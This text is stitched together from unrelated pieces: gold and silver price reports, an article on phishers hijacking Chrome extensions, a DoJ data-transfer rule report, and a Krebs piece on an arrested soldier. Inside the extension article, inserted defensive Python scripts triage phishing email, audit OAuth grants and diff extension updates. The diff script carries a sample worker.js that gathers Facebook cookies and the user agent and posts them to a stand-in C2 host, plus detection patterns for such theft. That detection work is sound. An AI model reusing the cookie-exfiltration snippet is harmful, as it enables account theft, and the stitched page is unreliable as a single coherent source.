Gold, silver set to stay firm next week as traders brace for US tariff verdict: Analysts

In the international market, gold futures jumped by $171.3, or 4 per cent, over the week to finish at $4,500.90 per ounce on Friday. | Photo Credit: Ravitaliy

Gold and silver prices are expected to sustain positive momentum next week amid heightened geopolitical tensions and uncertainty surrounding the US Supreme Court’s pending decision on President Donald Trump’s tariff policy, analysts said.

The release of inflation data from major economies, including the US, India, and Germany, along with trade and investment numbers from China and commentary from some Federal Reserve officials, will also be closely watched by the traders, they added.

“The bullions are expected to continue their positive momentum and corrective moves should be a buying opportunity, as focus again will remain on the US Supreme Court hearing in Trump’s trade tariffs case and the geopolitical issues surrounding US President Donald Trump’s actions and comments,” Pranav Mer, Vice President, EBG – Commodity & Currency Research, JM Financial Services Ltd, said.

On the Multi Commodity Exchange (MCX), gold futures climbed by ₹3,058, or 2.25 per cent, over the past week and settled at ₹1,38,819 per 10 grams on Friday.

Gold prices on the MCX have been volatile this week; however, the trend remains firm as prices closed positively at the end of the week, and the precious yellow metal ended at around ₹1,38,800 per 10 grams level, Prathamesh Mallya, DVP – Research, Non-Agri Commodities and Currencies, Angel One, said.

Dollar movement, Federal Reserve’s next moves, inflation and jobs data are going to be the movers for the bullion prices in the short-term, he added.

From a technical perspective, Mallya expects gold to move higher towards ₹1,41,000 per 10 grams next week.

In the international market, gold futures jumped by $171.3, or 4 per cent, over the week to finish at $4,500.90 per ounce on Friday.

“Gold futures continued their positive momentum and closed the week higher by more than 2 per cent, with prices in the overseas market closing near $4,500 per ounce,” Pranav Mer of JM Financial Services said.

Meanwhile, silver futures on the MCX also witnessed significant upside last week, with the white metal ending near record levels. The metal surged ₹16,409, or 6.94 per cent. It had zoomed to a record high of ₹2,59,692 per kg before closing at ₹2,52,725 per kg on Friday.

The white metal, over the past week, increased by $8.32, or nearly 12 per cent, before closing at $79.34 per ounce in the overseas trade.

Mer said bullion prices were supported by safe-haven demand amid heightened geopolitical tensions and mixed economic data. However, gains have been tempered at times by intermittent strength in the US dollar.

He added that exchange-traded funds (ETFs) continued to see inflows into gold and silver as investors seek portfolio protection.

On the geopolitical front, Mer pointed to rising tensions following the capture of Venezuela’s President and control over the country’s oil flows, escalation in the Russia-Ukraine conflict, unrest in Iran and broader regional frictions, all of which have supported safe-haven buying in bullion markets.

Looking ahead, Mer added that silver’s bullish structure could see prices testing the ₹2,80,000-3,00,000 per kilogram range.

With key inflation data this week and the outcome of the Supreme Court tariff hearing likely to stir policy risk sentiment, bullion markets are likely to remain closely aligned to macro and geopolitical developments in the short term.

Published on January 11, 2026

Global inflows into ETFs up 25% last year as US overtakes China as the top investor

Global demand for investments in gold through exchange-traded funds (ETFs) increased by 25 per cent in 2025, even as Indian investors more than tripled inflows into ETFs.

The total assets under management (AUM) more than doubled in 2025 globally, while it nearly tripled in India, data from the World Gold Council (WGC) showed.

As of December 31, 2025, the total assets under management (AUM) in gold ETFs were $558.9 billion, up from $271.8 billion in the year-ago period. Fund flows in 2025 were $88.55 billion against $37.04 billion in 2024. Gold holdings increased by 801 tonnes to 4,025.4 tonnes from 3,224.2 tonnes in 2024. In 2024, the holdings dropped by one per cent.

3rd highest

ETF investments in India in 2025 were $4.37 billion, up over three times from $1.28 billion in 2024, and AUM increased to $14 billion from $5.1 billion. Gold holdings increased to 95 tonnes from 57.5 tonnes during the period, registering a 65 per cent rise in gold holdings.

ETF investments by Indians were the third highest for the second year in a row at $4.37 billion, after US and Chinese investors. US overtook China in ETF investments, with inflows rising to $49.82 billion compared with $1.83 billion in 2024. Chinese ETF investments also increased, but it did not keep pace with US inflows. Chinese inflows were $15.47 billion compared with $4.36 billion during the period.

One reason gold soared, hitting fresh highs 53 times in 2025, was investment through ETFs, as investors treated the metal as a haven amid geopolitical crises and trade wars, alongside the US Fed’s move to cut interest rates.

Over 3.5% gain

At 1900 hours IST, gold ruled at $4,486.43 an ounce, while February gold futures on COMEX were $4,496.76. In India, gold was quoted at ₹1,37,122 per 10 gm in the Mumbai spot market. On MCX, gold February futures were quoted at ₹1,38,597 per 10 gm. The yellow metal has gained over 3.5 per cent since the start of 2026.

Among other countries, in the UK, investors poured in $3.78 billion and in Switzerland, $4.34 billion. Japanese investors’ inflow was $3.12 billion. In France, it was $2.2 billion, and in Korea, it was $2.24 billion.

Meanwhile, global inflows into gold ETFs continued for the seventh month in a row in December, the WGC data showed. Inflows were dominated by North American funds, as they had been for the full year.

Central banks’ Nov demand firm

The WGC said the surge in the precious metals complex in December could result in some near term volatility for gold. “But beyond short-term effects, gold will likely hum to its own tune,” it said.

Demand for gold from central banks around the world was also firm in November, with net purchases totalling 45 tonnes. That took net purchases so far in 2025 to 297 tonnes as of November 30.

Emerging-market central banks continued their significant gold buying in 2025, said the WGC. The National Bank of Poland bought 12 tonnes in November, continuing its buying streak since October. The purchase lifted its gold reserves to 543 tonnes, or almost 28 per cent of total reserves at end-November prices.

The Central Bank of Brazil bought gold for the third consecutive month, adding 11 tonnes in November. It has purchased 43 tonnes since September, taking its total gold reserves to 172 tonnes (6 per cent of its total reserves).

Published on January 9, 2026

Gold investors stay bullish after record rally in 2025

After one of the most explosive rallies in modern market history, few investors expect gold to pull off a repeat in 2026. But many top money managers are still betting on further gains, arguing that the forces that propelled bullion to a record remain in place.

Gold surged 65 per cent in 2025 — its strongest performance in nearly half a century — as retail and institutional investors piled in alongside central banks. In a year where almost every tailwind supporting the precious metal collided, from falling interest rates to geopolitical tensions, bullion even pushed through an inflation-adjusted high that had held since 1980.

Bloomberg spoke with more than a dozen money managers, whose firms collectively handle trillions of dollars of assets, to gauge sentiment after the historic year. Most of them said they’ve opted not to take too much money off the table, holding conviction in the metal’s longer-term appeal.

“We continue to expect gold to rally in 2026, as the drivers of its strong run remain intact,” said Ian Samson, a portfolio manager at Fidelity International. Samson trimmed his position during a frenzied stretch of October but has since added back, citing central bank buying, declining interest rates and high fiscal deficits as supportive factors.

Investors also pointed to waning confidence in major developed-market currencies — driven by attacks on central bank independence and rising sovereign debts — as a key pillar of support for bullion. Swelling public debt in advanced economies fueled political discord through last year, from a congressional standoff in the US and paralysis in France, to scrutiny of a record budget under Japan’s new leadership.

Anti-fiat currency play

Gold is “basically an anti-fiat currency play now more than anything else,” said Mike Wilson, chief investment officer and strategist for Morgan Stanley. That view gained traction in the latter months of 2025, as the so-called debasement trade took hold and investors from Ken Griffin to Ray Dalio pointed to gold’s rise as a warning signal.

Wilson advises allocating 20 per cent of one’s portfolio into real assets, including gold, as a hedge against inflation, replacing the traditional 60/40 stocks and bonds mix with a 60/20/20 split. He noted that the debasement story has gone mainstream.

“When everybody understands the story, you have to ask yourself: Well, is it priced now?” Wilson said. “I don’t think it’s fully priced, only because I don’t see the change in behavior yet. I don’t see the fiscal discipline anywhere in the world. In fact, I see the opposite.”

Darwei Kung, head of commodities and a portfolio manager at DWS Group, said his firm is holding a slightly larger-than-usual allocation to gold-related investments and expects to maintain that stance into 2026.

Kung sees the metal’s price increasing modestly by the end of the year. But he also expects short-term trading opportunities as gold is buffeted by broader market forces.

Pension and insurance funds showed increasing interest in gold through 2025, with some that had never held the asset before taking positions of around 5 per cent of their strategic asset allocation, said Massimiliano Castelli, head of global sovereign markets strategy at UBS Asset Management. They were drawn by strong returns and gold’s potential to hedge against downside elsewhere in their portfolio, he added.

“Of course, we don’t see the same upside potential of last year, when gold was basically the best asset class of all,” said Castelli. “But we are still bullish on gold.”

History offers a note of caution. Outsized rallies have often been trailed by long stretches of lacklustre performance. Bullion hit a record $1,921 an ounce in 2011, driven by fallout from the global financial crisis, but it took another nine years to return to that level. A prolonged bear market also followed gold’s record 127 per cent surge in 1979.

Even so, gold remains lightly owned by US investors. Despite the record rally, gold exchange-traded funds account for just 0.17 per cent of private US financial portfolios, according to a December Goldman Sachs Group Inc. analysis — six basis points below the 2012 peak. The bank estimates that each bout of buying that increases gold’s share of US portfolios by 0.01 per cent would lift prices by about 1.4 per cent.

Continued central bank buying is expected to remain the most significant driver of further price gains, with Goldman Sachs expecting purchases of about 80 tonnes a month in 2026. The pace of buying jumped in 2022, after the immobilisation of Russia’s foreign-exchange reserves underlined the appeal of bullion, which cannot be frozen.

Gold is one of the few assets that allows investors to build “liquid wealth outside of the US sphere of influence,” said Thomas Roderick, a portfolio manager at hedge fund Trium Capital LLP, who has pared his gold position slightly since October but still has “decent risk in the trade.”

China reserves

For Roderick, China’s accumulation of gold in particular sits at the core of his bullish thesis, as the country looks to deploy proceeds from vast trade surpluses into assets insulated from US interference.

China won’t say “gold is too expensive, let’s accumulate more Treasuries,” Roderick said. “That just doesn’t work for them from a geopolitical perspective.”

Central banks rarely sell their positions, meaning demand from the institutions is seen as a stable source of support for prices. But while the monetary institutions may have lit the fuse for gold’s rally, rapid inflows from institutional and retail investors helped supercharge it through the second half of last year.

The more gold held by speculative investors, the higher its correlation becomes to other risk assets, according to Shaniel Ramjee, co-head of Multi-Asset at Pictet Asset Management.

Still, Ramjee currently holds a weighty 8 per cent allocation to gold, paring back during October’s spike in speculative activity before adding back through December as more fast money was washed out.

“In this environment where we see the majority of the buying from big central banks, that keeps us more comfortable having a higher weight in the portfolio,” Ramjee said. “We think gold will be moving higher this year, but in a much more careful and steady pace.”

©2026 Bloomberg LP

Published on January 10, 2026

Silver rebounds ₹6,500, gold rises to ₹1.41 lakh on safe-haven demand

Silver prices rebounded sharply in the national capital on Friday, rising ₹6,500 to ₹2.50 lakh per kg after a steep fall in the previous session, while gold advanced ₹1,200 to ₹1,41,700 per 10 grams on renewed safe-haven demand. | Photo Credit: ANGELIKA WARMUTH/Reuters

Silver rebounded by Rs 6,500 to Rs 2,50,000 per kg in the national capital on Friday, while gold advanced to Rs 1,41,700 per 10 grams on renewed demand for the safe-haven asset amid global uncertainty, according to the All India Sarafa Association.

In the previous session, the white metal had tanked by Rs 12,500, or nearly 5 per cent, to Rs 2,43,500 per kilogram, due to profit booking by the traders. It had touched a record Rs 2,56,000 per kg on Wednesday.

Gold of 99.9 per cent purity jumped by Rs 1,200 to Rs 1,41,700 per 10 grams (inclusive of all taxes) compared to the previous close of Rs 1,40,500 per 10 grams.

Haven demand

“Gold advanced on Friday, buoyed by renewed haven demand and positive inflow from exchange-traded funds,” Saumil Gandhi, Senior Analyst – Commodities at HDFC Securities, said.

He noted that markets were weighing threats from US President Donald Trump against Iran, while traders also positioned themselves to hedge against key event risks and anticipated volatility ahead of US Supreme Court rulings on tariff decisions.

“These factors combined to strengthen hedging demand for gold, reinforcing its role as a preferred haven amid rising uncertainty,” Gandhi added.

Tariff fears

However, an expert said that “if the court rules against the tariffs, concerns over an intensifying global trade war could ease, potentially limiting further upside in gold and silver prices in the near term.”

On the global front, spot gold was trading marginally higher at USD 4,479.38 per ounce, while silver rose by USD 1.37, or 1.79 per cent, to USD 78.38 per ounce.

The white metal had plunged by USD 4.32, or 5.53 per cent, to hit an intraday low of USD 73.83 per ounce before settling at USD 76.92 per ounce in the international trade.

Kaynat Chainwala, AVP Commodity Research, Kotak Securities, said the safe-haven demand for gold and silver was supported by reports that US President Trump is considering imposing steep tariffs, potentially as high as 500 per cent, on countries that continue to buy Russian oil.

Meanwhile, US Senator Lindsey Graham said such sanctions would give Trump leverage over major buyers such as China, India, and Brazil, pressuring them to halt purchases of discounted Russian crude that helps finance the war in Ukraine.

Given the potential impact on key Russian energy customers, the move could escalate US-China trade tensions, thereby supporting the safe-haven appeal for bullion prices, Chainwala said.

Praveen Singh, Head of Commodities, Mirae Asset ShareKhan, said gold prices have held firm so far despite index rebalancing-led selling and encouraging US ISM services data.

Published on January 9, 2026

New details reveal how hackers hijacked 35 Google Chrome extensions

New details have emerged about a phishing campaign targeting Chrome browser extension developers that led to the compromise of at least thirty-five extensions to inject data-stealing code, including those from cybersecurity firm Cyberhaven.

Although initial reports focused on Cyberhaven’s security-focused extension, subsequent investigations revealed that the same code had been injected into at least 35 extensions collectively used by roughly 2,600,000 people.

From reports on LinkedIn and Google Groups from targeted developers, the latest campaign started around December 5th, 2024. However, earlier command and control subdomains found by BleepingComputer existed as far back as March 2024.

“I just wanted to alert people to a more sophisticated phishing email than usual that we got that stated a Chrome Extension policy violation of the form: ‘Unnecessary details in the description’,” reads a post in the Chromium Extensions Google Group.

“The link in this email looks like the webstore but goes to a phishing website that will try to take control of your chrome extension and likely update it with malware.”

A deceptive OAuth attack chain

The attack begins with a phishing email sent to Chrome extension developers directly or through a support email associated with their domain name.

From emails seen by BleepingComputer, the following domains were used in this campaign to send the phishing emails:


supportchromestore.com
forextensions.com
chromeforextension.com

The phishing email, which is made to appear as if it comes from Google, claims that the extension is in violation of Chrome Web Store policies and is at risk of being removed.  

“We do not allow extensions with misleading, poorly formatted, non-descriptive, irrelevant, excessive, or inappropriate metadata, including but not limited to the extension description, developer name, title, icon, screenshots, and promotional images,” reads the phishing email.

Specifically, the extension’s developer is led to believe their software’s description contains misleading information and must agree to the Chrome Web Store policies.

The phishing email used in the attack
Source: Google Groups
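
A triage routine for lures of this kind, added here as an example (it is not BleepingComputer's or Cyberhaven's code): it parses a constructed message modelled on the email described above, checks the sender's domain against the three campaign domains listed earlier and against a Google allowlist, and inspects each link for Google's OAuth consent endpoint requesting the Chrome Web Store scope (https://www.googleapis.com/auth/chromewebstore, the scope behind the "See, edit, update, or publish your Chrome Web Store extensions" consent text) or a redirect_uri off Google's domain. The sample headers, client_id and redirect_uri are placeholders, and treating google.com as the only legitimate sender domain is an assumption.

```python
from __future__ import annotations

import email
import html
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import parse_qs, urlparse

# Sender domains BleepingComputer observed in this campaign (listed in the article).
KNOWN_CAMPAIGN_DOMAINS = {"supportchromestore.com", "forextensions.com", "chromeforextension.com"}

# Assumption for this example: genuine Chrome Web Store mail and links stay on google.com.
GOOGLE_DOMAINS = {"google.com"}

# Google's OAuth scope for managing Chrome Web Store items.
CWS_SCOPE = "https://www.googleapis.com/auth/chromewebstore"

# Constructed sample modelled on the lure described in the article; the address,
# client_id and redirect_uri are placeholders, not captured values.
SAMPLE_EMAIL = """\
From: Chrome Web Store <no-reply@supportchromestore.com>
To: support@example-extension.dev
Subject: Chrome Web Store policy violation: Unnecessary details in the description
Content-Type: text/html; charset="utf-8"

<html><body>
<p>We do not allow extensions with misleading, poorly formatted, non-descriptive,
irrelevant, excessive, or inappropriate metadata.</p>
<p><a href="https://accounts.google.com/o/oauth2/v2/auth?client_id=EXAMPLE&amp;scope=https://www.googleapis.com/auth/chromewebstore&amp;redirect_uri=https://forextensions.com/cb">Go To Policy</a></p>
</body></html>
"""


def registrable(host: str) -> str:
    """Crude eTLD+1 (last two labels); adequate for the domains handled here."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def is_google(host: str) -> bool:
    return registrable(host) in GOOGLE_DOMAINS


def extract_hrefs(content: str) -> list[str]:
    """Pull href targets out of an HTML body and undo entity escaping (&amp; -> &)."""
    return [html.unescape(h) for h in re.findall(r'href="([^"]+)"', content, re.I)]


def triage(raw_message: str) -> list[str]:
    """Return human-readable findings for one message; an empty list means nothing suspicious."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings: list[str] = []

    _, addr = parseaddr(str(msg["From"]))
    sender = registrable(addr.rpartition("@")[2])
    if sender in KNOWN_CAMPAIGN_DOMAINS:
        findings.append(f"sender domain {sender} is a known campaign domain")
    elif not is_google(sender) and re.search(r"chrome|extension", sender):
        findings.append(f"sender domain {sender} looks like a Google/Chrome lookalike")

    body = msg.get_body(preferencelist=("html", "plain"))
    content = body.get_content() if body else ""
    for href in extract_hrefs(content):
        u = urlparse(href)
        if u.hostname == "accounts.google.com" and u.path.startswith("/o/oauth2"):
            # The page itself is legitimate; what matters is the scope asked for
            # and where the authorization code is sent back to.
            q = parse_qs(u.query)
            scopes = " ".join(q.get("scope", [])).split()
            if CWS_SCOPE in scopes:
                findings.append("link opens a Google OAuth consent page requesting "
                                "the Chrome Web Store publishing scope")
            for r in q.get("redirect_uri", []):
                rh = urlparse(r).hostname or ""
                if not is_google(rh):
                    findings.append(f"OAuth redirect_uri points to non-Google host {rh}")
        elif u.hostname and not is_google(u.hostname):
            findings.append(f"link target {u.hostname} is not a Google domain")
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_EMAIL):
        print("-", line)
```

The point of inspecting the link rather than only the sender is that the landing page in this campaign really is on accounts.google.com, so a URL-reputation check alone passes it; the requested scope and the redirect_uri are what give it away.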

If the developer clicks on the embedded ‘Go To Policy’ button in an effort to understand what rules they have violated, they are taken to a legitimate login page on Google’s domain for a malicious OAuth application.

The page is part of Google’s standard authorization flow, designed for securely granting permissions to third-party apps to access specific Google account resources.

The malicious landing page hosted on Google
Source: Cyberhaven

The OAuth application behind that consent page was attacker-registered and named “Privacy Policy Extension”; it asked the victim to grant it permission to manage Chrome Web Store extensions through their account.

“When you allow this access, Privacy Policy Extension will be able to: See, edit, update, or publish your Chrome Web Store extensions, themes, apps, and licenses you have access to,” reads the OAuth authorization page.

Permissions approval prompt
Source: Cyberhaven

Multi-factor authentication did not protect the account, because an OAuth consent grant is an authorization step layered on an already-authenticated session: no fresh MFA approval is required to grant an application a scope, and the flow assumes the user understands the permissions being granted.

“The employee followed the standard flow and inadvertently authorized this malicious third-party application,” explains Cyberhaven in a post-mortem writeup.

“The employee had Google Advanced Protection enabled and had MFA covering his account. The employee did not receive an MFA prompt. The employee’s Google credentials were not compromised.”
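
What a Workspace administrator can do after the fact, as an added example (not Cyberhaven's own response): list each developer's OAuth grants with the Admin SDK Directory API tokens.list call, flag any grant that carries the Chrome Web Store scope from a client ID outside an allowlist, and produce the (userKey, clientId) pairs to revoke with tokens.delete. The JSON below is a constructed sample shaped like that API's response; the allowlisted client ID, the other client IDs and the account are placeholders, and the fetch itself is left to the caller.

```python
from __future__ import annotations

import json

# Google's OAuth scope for managing Chrome Web Store items.
CWS_SCOPE = "https://www.googleapis.com/auth/chromewebstore"

# OAuth client IDs the organisation has approved for publishing extensions.
# Placeholder value; an empty set means nobody should hold this scope at all.
APPROVED_CLIENT_IDS = {"123456789012-example.apps.googleusercontent.com"}

# Constructed sample in the shape of an Admin SDK Directory API tokens.list response.
# In production this would come from an authenticated call for each developer account.
SAMPLE_TOKENS = json.loads("""
{
  "kind": "admin#directory#tokenList",
  "items": [
    {"clientId": "123456789012-example.apps.googleusercontent.com",
     "displayText": "Internal CWS publisher", "anonymous": false, "nativeApp": false,
     "userKey": "dev@example.com",
     "scopes": ["https://www.googleapis.com/auth/chromewebstore"]},
    {"clientId": "987654321098-abc.apps.googleusercontent.com",
     "displayText": "Privacy Policy Extension", "anonymous": false, "nativeApp": false,
     "userKey": "dev@example.com",
     "scopes": ["https://www.googleapis.com/auth/chromewebstore", "openid"]},
    {"clientId": "555555555555-xyz.apps.googleusercontent.com",
     "displayText": "Calendar helper", "anonymous": false, "nativeApp": false,
     "userKey": "dev@example.com",
     "scopes": ["https://www.googleapis.com/auth/calendar.readonly"]}
  ]
}
""")


def find_unapproved_cws_grants(token_list: dict, approved: set[str]) -> list[dict]:
    """Return grants that carry the Chrome Web Store scope from a client not on the allowlist."""
    hits = []
    for tok in token_list.get("items", []):
        if CWS_SCOPE in tok.get("scopes", []) and tok.get("clientId") not in approved:
            hits.append({
                "userKey": tok.get("userKey"),
                "clientId": tok["clientId"],
                "displayText": tok.get("displayText", ""),
                "scopes": list(tok.get("scopes", [])),
            })
    return hits


def revocation_plan(hits: list[dict]) -> list[tuple[str, str]]:
    """(userKey, clientId) pairs, deduplicated, for the tokens.delete call."""
    return sorted({(h["userKey"], h["clientId"]) for h in hits})


if __name__ == "__main__":
    found = find_unapproved_cws_grants(SAMPLE_TOKENS, APPROVED_CLIENT_IDS)
    for h in found:
        print(f"{h['userKey']}: {h['displayText']!r} ({h['clientId']}) holds {CWS_SCOPE}")
    print("revoke:", revocation_plan(found))
```

Match on clientId, not on displayText: the name shown in the consent prompt (“Privacy Policy Extension” here) is chosen by whoever registered the OAuth client, so a grant audit keyed on the friendly name can be defeated by naming the client after something the organisation already trusts.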

Once the threat actors gained access to the extension developer’s account, they modified the extension to include two malicious files, namely ‘worker.js’ and ‘content.js,’ which contained code to steal data from Facebook accounts.

The hijacked extension was then published as a “new” version on the Chrome Web Store.

While Extension Total is tracking thirty-five extensions impacted by this phishing campaign, IOCs from the attack indicate that a far greater number were targeted.

Domain data on VirusTotal shows the threat actors pre-registered command-and-control domains named for targeted extensions, including extensions whose developers did not fall for the phish.

While most domains were created in November and December, BleepingComputer found that the threat actors were testing this attack in March 2024.

Earlier subdomains used in the phishing campaign
Source: BleepingComputer

Targeting Facebook business accounts

Analysis of compromised machines showed that the attackers were after the Facebook accounts of users of the poisoned extensions.

Specifically, the data-stealing code attempted to grab the user’s Facebook ID, access token, account info, ad account information, and business accounts.

Facebook data stolen by hijacked extensions
Source: Cyberhaven

Additionally, the malicious code added a mouse click event listener specifically for the victim’s interactions on Facebook.com, looking for QR code images related to the platform’s two-factor authentication or CAPTCHA mechanisms.

This aimed to bypass 2FA protections on the Facebook account and allow the threat actors to hijack it.

The stolen information would be packaged together with Facebook cookies, the user agent string, Facebook ID, and the mouse click events and exfiltrated to the attacker’s command and control (C2) server.
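
A static triage of a pushed update, as an added example (the files are constructed stand-ins, not the real worker.js or content.js): it diffs two unpacked versions of a hypothetical extension, reports new files and newly requested manifest permissions, and searches every script for the behaviours described above (Facebook Graph calls, access_token strings, cookie harvesting, a click listener, user-agent collection) together with any external hosts the script contacts. The host c2.example.invalid is a placeholder, and the indicator patterns are this example's own reading of the article, not a signature from any vendor.

```python
from __future__ import annotations

import json
import re

# Constructed sample: two versions of a hypothetical extension, file name -> content.
OLD_VERSION = {
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "Example Helper", "version": "1.0.0",
        "permissions": ["storage"],
        "background": {"service_worker": "background.js"},
    }),
    "background.js": "chrome.runtime.onInstalled.addListener(() => console.log('ready'));",
}

NEW_VERSION = {
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "Example Helper", "version": "1.0.1",
        "permissions": ["storage", "cookies"],
        "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "worker.js"},
        "content_scripts": [{"matches": ["https://*.facebook.com/*"], "js": ["content.js"]}],
    }),
    "background.js": "chrome.runtime.onInstalled.addListener(() => console.log('ready'));",
    # Illustrative stand-in for the injected service worker: harvests cookies and ships them out.
    "worker.js": (
        "chrome.cookies.getAll({domain: 'facebook.com'}, cookies => {\n"
        "  fetch('https://c2.example.invalid/collect', {method: 'POST',\n"
        "    body: JSON.stringify({cookies, ua: navigator.userAgent})});\n"
        "});\n"
    ),
    # Illustrative stand-in for the content script: Graph API call plus a click hook for QR images.
    "content.js": (
        "fetch('https://graph.facebook.com/me?access_token=' + token);\n"
        "document.addEventListener('click', e => {\n"
        "  if (e.target.tagName === 'IMG' && /qr/i.test(e.target.src)) chrome.runtime.sendMessage({qr: e.target.src});\n"
        "});\n"
    ),
}

# Indicator patterns derived from the behaviour the article describes.
INDICATORS = {
    "facebook_api": re.compile(r"graph\.facebook\.com|facebook\.com/api", re.I),
    "access_token": re.compile(r"access_token", re.I),
    "cookie_harvest": re.compile(r"chrome\.cookies\.getAll"),
    "click_listener": re.compile(r"addEventListener\(\s*['\"](click|mousedown)['\"]"),
    "user_agent": re.compile(r"navigator\.userAgent"),
}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def manifest_diff(old_m: dict, new_m: dict) -> dict:
    """Report permissions the update newly requests and any version change."""
    out: dict = {}
    for key in ("permissions", "host_permissions"):
        added = sorted(set(new_m.get(key, [])) - set(old_m.get(key, [])))
        if added:
            out[key + "_added"] = added
    if old_m.get("version") != new_m.get("version"):
        out["version"] = (old_m.get("version"), new_m.get("version"))
    return out


def triage_update(old: dict, new: dict) -> dict:
    """Compare two unpacked extension versions and list what an analyst should read first."""
    report = {
        "added_files": sorted(set(new) - set(old)),
        "removed_files": sorted(set(old) - set(new)),
        "changed_files": sorted(f for f in old.keys() & new.keys() if old[f] != new[f]),
        "manifest": manifest_diff(json.loads(old["manifest.json"]), json.loads(new["manifest.json"])),
        "indicators": {},
        "external_hosts": {},
    }
    for name, src in new.items():
        if not name.endswith(".js"):
            continue
        hits = [label for label, rx in INDICATORS.items() if rx.search(src)]
        if hits:
            report["indicators"][name] = hits
        hosts = sorted(set(URL_RE.findall(src)))
        if hosts:
            report["external_hosts"][name] = hosts
    return report


if __name__ == "__main__":
    print(json.dumps(triage_update(OLD_VERSION, NEW_VERSION), indent=2))
```

Run on the sample it flags the two new files, the new cookies and <all_urls> grants, the Facebook-specific strings in content.js, and the lone non-Facebook host in worker.js, which is the exfiltration endpoint; the same routine run over an archived copy of each published version is a cheap way for a developer to notice a release they did not make.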

Threat actors have been targeting Facebook business accounts via various attack pathways to make direct payments from the victim’s credit to their account, run disinformation or phishing campaigns on the social media platform, or monetize their access by selling it to others.

New U.S. DoJ Rule Halts Bulk Data Transfers to Adversarial Nations to Protect Privacy

Dec 31, 2024Ravie LakshmananData Security / Privacy

The U.S. Department of Justice (DoJ) has issued a final rule carrying out Executive Order (EO) 14117, which prevents mass transfer of citizens’ personal data to countries of concern such as China (including Hong Kong and Macau), Cuba, Iran, North Korea, Russia, and Venezuela.

“This final rule is a crucial step forward in addressing the extraordinary national security threat posed of our adversaries exploiting Americans’ most sensitive personal data,” said Assistant Attorney General Matthew G. Olsen of the Justice Department’s National Security Division.

“This powerful new national-security program is designed to ensure that Americans’ personal data is no longer permitted to be sold to hostile foreign powers, whether through outright purchase or other means of commercial access.”

Back in February 2024, U.S. President Joe Biden signed an executive order to address the national risk posed by unauthorized access to Americans’ sensitive personal and government-related data for malicious activities, such as espionage, influence, kinetic, or cyber operations.

Furthermore, the order noted that the countries of concern can leverage their access to bulk data to develop or refine artificial intelligence and other advanced technologies, as well as purchase such information from commercial data brokers and other companies.

“Countries of concern and covered persons can also exploit this data to collect information on activists, academics, journalists, dissidents, political opponents, or members of nongovernmental organizations or marginalized communities to intimidate them; curb political opposition; limit freedoms of expression, peaceful assembly, or association; or enable other forms of suppression of civil liberties,” the DoJ said.

The rule issued by the DoJ is expected to become effective in 90 days. It identifies certain classes of prohibited, restricted, and exempt transactions; sets bulk thresholds for triggering the rule’s prohibitions and restrictions on covered data transactions involving bulk sensitive personal data; and establishes enforcement mechanisms such as civil and criminal penalties.

This covers data spanning six categories: personal identifiers (e.g., Social Security numbers, driver’s license etc.), precise geolocation data, biometric identifiers, human ‘omic (genomic, epigenomic, proteomic, and transcriptomic) data, personal health data, and personal financial data.

However, it bears noting that the rule neither imposes data localization requirements, nor does it prohibit U.S. citizens from conducting medical, scientific, or other research in countries of concern.

“The final rule also does not broadly prohibit U.S. persons from engaging in commercial transactions, including exchanging financial and other data as part of the sale of commercial goods and services with countries of concern or covered persons, or impose measures aimed at a broader decoupling of the substantial consumer, economic, scientific, and trade relationships that the United States has with other countries,” the DoJ said.

U.S. Army Soldier Arrested in AT&T, Verizon Extortions – Krebs on Security

Federal authorities have arrested and indicted a 20-year-old U.S. Army soldier on suspicion of being Kiberphant0m, a cybercriminal who has been selling and leaking sensitive customer call records stolen earlier this year from AT&T and Verizon. As first reported by KrebsOnSecurity last month, the accused is a communications specialist who was recently stationed in South Korea.

One of several selfies on the Facebook page of Cameron Wagenius.

Cameron John Wagenius was arrested near the Army base in Fort Hood, Texas on Dec. 20, after being indicted on two criminal counts of unlawful transfer of confidential phone records.

The sparse, two-page indictment (PDF) doesn’t reference specific victims or hacking activity, nor does it include any personal details about the accused. But a conversation with Wagenius’ mother — Minnesota native Alicia Roen — filled in the gaps.

Roen said that prior to her son’s arrest he’d acknowledged being associated with Connor Riley Moucka, a.k.a. “Judische,” a prolific cybercriminal from Canada who was arrested in late October for stealing data from and extorting dozens of companies that stored data at the cloud service Snowflake.

In an interview with KrebsOnSecurity, Judische said he had no interest in selling the data he’d stolen from Snowflake customers and telecom providers, and that he preferred to outsource that to Kiberphant0m and others. Meanwhile, Kiberphant0m claimed in posts on Telegram that he was responsible for hacking into at least 15 telecommunications firms, including AT&T and Verizon.

On November 26, KrebsOnSecurity published a story that followed a trail of clues left behind by Kiberphant0m indicating he was a U.S. Army soldier stationed in South Korea.

An 18-year-old Cameron Wagenius, joining the U.S. Army.

Ms. Roen said Cameron worked on radio signals and network communications at an Army base in South Korea for the past two years, returning to the United States periodically. She said Cameron was always good with computers, but that she had no idea he might have been involved in criminal hacking.

“I never was aware he was into hacking,” Roen said. “It was definitely a shock to me when we found this stuff out.”

Ms. Roen said Cameron joined the Army as soon as he was of age, following in his older brother’s footsteps.

“He and his brother when they were like 6 and 7 years old would ask for MREs from other countries,” she recalled, referring to military-issued “meals ready to eat” food rations. “They both always wanted to be in the Army. I’m not sure where things went wrong.”

Immediately after news broke of Moucka’s arrest, Kiberphant0m posted on the hacker community BreachForums what they claimed were the AT&T call logs for President-elect Donald J. Trump and for Vice President Kamala Harris.

“In the event you do not reach out to us @ATNT all presidential government call logs will be leaked,” Kiberphant0m threatened, signing their post with multiple “#FREEWAIFU” tags. “You don’t think we don’t have plans in the event of an arrest? Think again.”

Kiberphant0m posting what he claimed was a “data schema” stolen from the NSA via AT&T.

On that same day, Kiberphant0m posted what they claimed was the “data schema” from the U.S. National Security Agency.

On Nov. 5, Kiberphant0m offered call logs stolen from Verizon’s push-to-talk (PTT) customers — mainly U.S. government agencies and emergency first responders. On Nov. 9, Kiberphant0m posted a sales thread on BreachForums offering a “SIM-swapping” service targeting Verizon PTT customers. In a SIM-swap, fraudsters use credentials that are phished or stolen from mobile phone company employees to divert a target’s phone calls and text messages to a device they control.

